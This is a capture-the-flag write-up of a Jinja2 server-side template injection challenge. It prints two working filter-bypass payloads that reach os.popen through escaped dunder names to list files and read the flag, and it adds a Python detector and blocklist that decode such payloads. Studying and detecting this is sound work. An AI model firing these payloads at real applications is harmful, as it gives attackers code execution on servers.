# Web - Antikythera

## Description

Lost in the labyrinthine calculations of planetary motion, I stumbled upon an anomaly. Ancient Greek symbols, not our modern equations, whispered of celestial mechanics. Driven by a scientist's curiosity, I cracked their cryptic code. The unearthed knowledge, a testament to their forgotten ingenuity, fueled the creation of the "Greek Astronomical Calculator." This isn't just a tool for prediction; it's a portal to a bygone era's uncanny understanding of the cosmos.

## Solution

Unfortunately, I don't have any images to show because the challenge is not up anymore. But basically, the challenge has an input field that is vulnerable to SSTI. This is confirmed by trying the typical SSTI input `{{7*7}}` and checking that the server evaluates the input to `49`.

Looking at [HackTricks](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#jinja2-python) and trying out a few other payloads, the server appears to be running Jinja2 (Python).

Thankfully, HackTricks has a page dedicated to Jinja2 SSTI, including payloads that bypass typical filters.

<figure><img src="/files/ESJlp30gdiiKds3kgSpq" alt=""><figcaption><p>HackTricks</p></figcaption></figure>

If we scroll down the page, we find a payload that seems to avoid most filters [here](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti#without-several-chars).

```jinja
{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}
```

The payload above achieves RCE by executing the `ls -l` command. Its output lists a `flag.txt` file in the working directory.

Finally, we run the `cat flag.txt` payload to read the flag:

```jinja
{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat${IFS}flag.txt')|attr('read')()%}{%print(a)%}{%endwith%}
```
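Why the payloads above slip past simple blocklists, as an added illustration that is not part of the original writeup: the underscores are hidden as `\x5f` escapes (which Jinja2 string literals decode) and the space in the shell command as `${IFS}`, so a filter that matches on `_`, `.`, `[` or `{{` in the raw input sees nothing. The small normalizer below decodes both tricks before matching, which is what a WAF rule or a log-review script has to do to recognise the dunder names and the command. The blocklist, function names and regexes are my own assumptions; the real fix is to never render user input as template source.

```python
import re

# Constructed sample: the `ls -l` payload from this writeup, exactly as it
# would arrive in the input field (the backslashes are literal characters).
SAMPLE_PAYLOAD = (
    '{%with a=request|attr("application")|attr("\\x5f\\x5fglobals\\x5f\\x5f")'
    '|attr("\\x5f\\x5fgetitem\\x5f\\x5f")("\\x5f\\x5fbuiltins\\x5f\\x5f")'
    "|attr('\\x5f\\x5fgetitem\\x5f\\x5f')('\\x5f\\x5fimport\\x5f\\x5f')('os')"
    "|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}"
)

# Hypothetical "typical" filter: block the tokens most SSTI payloads rely on.
# The payload above deliberately contains none of them.
NAIVE_BLOCKLIST = ("{{", "_", ".", "[")

def naive_filter_hits(payload: str) -> list:
    """Return the blocklist entries present in the raw payload."""
    return [tok for tok in NAIVE_BLOCKLIST if tok in payload]

def normalize(payload: str) -> str:
    """Undo the two encodings the payload uses before matching on it."""
    # \x5f\x5f -> __ : Jinja2 string literals honour Python-style \xHH escapes
    decoded = re.sub(r"\\x([0-9a-fA-F]{2})",
                     lambda m: chr(int(m.group(1), 16)), payload)
    # ${IFS} -> ' ' : the shell expands the field separator to whitespace
    return decoded.replace("${IFS}", " ")

DUNDER_RE = re.compile(r"__(globals|builtins|import|getitem|class|mro|subclasses)__")
SINK_RE = re.compile(r"\b(popen|system|subprocess)\b")
ATTR_RE = re.compile(r"\|\s*attr\s*\(")            # request|attr(...) chaining
POPEN_ARG_RE = re.compile(r"attr\('popen'\)\('([^']*)'\)")  # this payload's shape

def ssti_indicators(payload: str) -> dict:
    """Match on the normalized form; a raw-string rule would miss all of this."""
    n = normalize(payload)
    return {
        "dunders": sorted(set(DUNDER_RE.findall(n))),
        "sinks": sorted(set(SINK_RE.findall(n))),
        "uses_attr_filter": bool(ATTR_RE.search(n)),
        "shell_commands": POPEN_ARG_RE.findall(n),
    }

if __name__ == "__main__":
    print("raw blocklist hits:", naive_filter_hits(SAMPLE_PAYLOAD))  # []
    print(ssti_indicators(SAMPLE_PAYLOAD))
```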

